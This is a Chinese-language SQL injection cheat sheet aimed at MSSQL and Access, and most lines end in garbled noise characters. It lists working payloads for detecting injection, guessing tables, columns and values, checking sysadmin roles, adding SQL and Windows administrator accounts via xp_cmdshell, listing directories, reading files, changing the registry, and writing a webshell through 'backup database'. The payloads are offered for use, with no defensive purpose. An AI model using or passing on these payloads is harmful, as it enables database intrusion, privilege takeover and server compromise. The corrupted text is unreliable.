1.判断是否有注入;and 1=1 ;and 1=2 ���T]6�c9_
2.初步判断是否是mssql ;and user>0 nh���eU~jb
"P'&+dH8
3.注入参数是字符'and [查询条件] and ''=' �e:J'&r& 1
�l^����!A�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' -#w�VtXaSc
��o�KYh�E�
5.判断数据库系统 aw/7Z`����
@mx$sNDkL�
;and (select count(*) from sysobjects)>0 mssql �\$'m�^tVU
7y�)=#ZG'R
;and (select count(*) from msysobjects)>0 access �*1W,�M�zg
tP`�G]BCbt
�QM �Z��Ut
�'}Wu3��X�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 +l��W}i�xt
adI!W-�/R:
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $%
�Ci8p�
gr>�o
�E#7
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 (]Ye[�j^"7
WBr:|F+~s
9.(1)猜字段的ascii值(access) 9��$+^"ilk
�K3rBl�!7v
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �)Ig+uDGk�
u�`Z0{��d
(2)猜字段的ascii值(mssql) ��z�r.+�'
nuSN)}b<Q�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 -��XV�E�V�
U|J$?aFDr�
10.测试权限结构(mssql) 5fu+rU-�#�
,\lY�Px\P[
"Ap$�Jl B�
�vm\��wO._
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 9q1H�SJ1�)
5wH54g�j}
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ]���3t�1=+
]$~��Fz��s
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- _ktK+8*�6`
+��UK%t>E8
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Q(|PZn�g�
o��)%-l�4S
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 2�W3N�L|�P
~=:2�~$gsn
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- !�%c{+�]�g
K`QOU�-M@}
;and 1=(select IS_MEMBER('db_owner'));-- �[DZ�q�Co�
DS:>/m>��)
b�4Z`y8=��
���R"U/R�S
11.添加mssql和系统的帐户 �F qeV�3�N
Zc'|�!pT _
;exec master.dbo.sp_addlogin username;-- v�2hZq-�q�
;exec master.dbo.sp_password null,username,password;-- *jM_��wwG�
\3Dk5cSDk+
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- g�A~20LS�t
K(nS$x1�G
;exec master.dbo.xp_cmdshell 'net user username password M{?zv�q?d�
DX��}B��0B
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- T�GU:(J�'^
�4\L��ZD{�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��rv9B}%�e
�3CR@'
qG-
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ;,1=zhK�U.
4_PCq��Ep)
pO��C% oj�
f64(a\Rw!^
12.(1)遍历目录 M�1oPOC\0.
$hkq>i� �\
;create table dirs(paths varchar(100), id int) +|y*��}b�G
|��K�L')&"
;insert dirs exec master.dbo.xp_dirtree 'c:\' XE�_�ir
Et
?y�~TC��qV
;and (select top 1 paths from dirs)>0 I��=K!)�X$
��NO�-k-�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) '�lJE�H�z\
'�X7%�3�5Y
{5^�K Xj$B
\6{��krn|�
(2)遍历目录 lVP�O�Yl%�
���9�G0D3F
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- s��\[L�pLt
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 K�Z�=�u5�4
&V'519vmoZ
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Cu�H2�E>wz
!fY7"E{�%%
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ypx: �)e"/
�HT���mI1�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ^Ye\�u�1n4
�GCDw�WCxh
Sw~(u��H_l
^�� eQFg�>
13.mssql中的存储过程 |%
z��^N*�
f-;��$0mTQ
xp_regenumvalues 注册表根键, 子键 0n
�Y6�A~�
{esJ�=FV\�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 U{6oLqwq3Y
`@[l\.Vt�:
xp_regread 根键,子键,键值名 ]r4b�RK�[1
qO-9
x0v#
;exec xp_regread X) V7�bV�W
[�4sEVu}��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 y$X(�S�\W�
(n,u�|}�8Y
xp_regwrite 根键,子键, 值名, 值类型, 值 4��({(���i
C{�EAmv��'
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 oM!xz1k�VL
:.k��Z�R;�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 07V8�;A<,�
,7W:�fw�dR
xp_regdeletevalue 根键,子键,值名 {(
#��zcK�
bu>q�s�U3
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �$�B;_Jo\|
NzQ9�Z1Mxy
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 : �[q0S@��
'OwyyPBF�
M�tS�3p�>4
v2Bzx/F�:
14.mssql的backup创建webshell dBSbu=^$�)
� ���v,=v�
use model G8n�rdN-9�
�.`jo/,?+O
create table cmd(str image); z-d��FDtiA
-w1�@!�Sdd
insert into cmd(str) values (''); J'b<�z.OW�
> _ <'���D
backup database model to disk='c:\l.asp'; @@@=}�!<H=
=�pcF:D#+�
&�?0:�v`4Y
s,�6`R�I�%
15.mssql内置函数 �y}FZ�D?�"
)�KE�[!ofD
;and (select @@version)>0 获得Windows的版本号 |�?d#eQ9a
#sTEQ�jJ,J
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 5�c5�oSy�+
�p��d3,p�Q
;and (select user_name())>0 爆当前系统的连接用户 Y4E/?�37j�
>���@_�im6
;and (select db_name())>0 得到当前连接的数据库 UDy(dn>J:J
W3r��?7�!~
K�v37s0|g�
g:7,~�}_}^
16.简洁的webshell j~E",7Q'��
20b<�68h$:
use model Fk�"Ee&H)(
~
����Vw9
create table cmd(str image); RBwO+J53y
]}Z4�P-�"t
insert into cmd(str) values (''); ���ST5V!jz
�-��#In;�~
backup database model to disk='g:\wwwtest\l.asp';
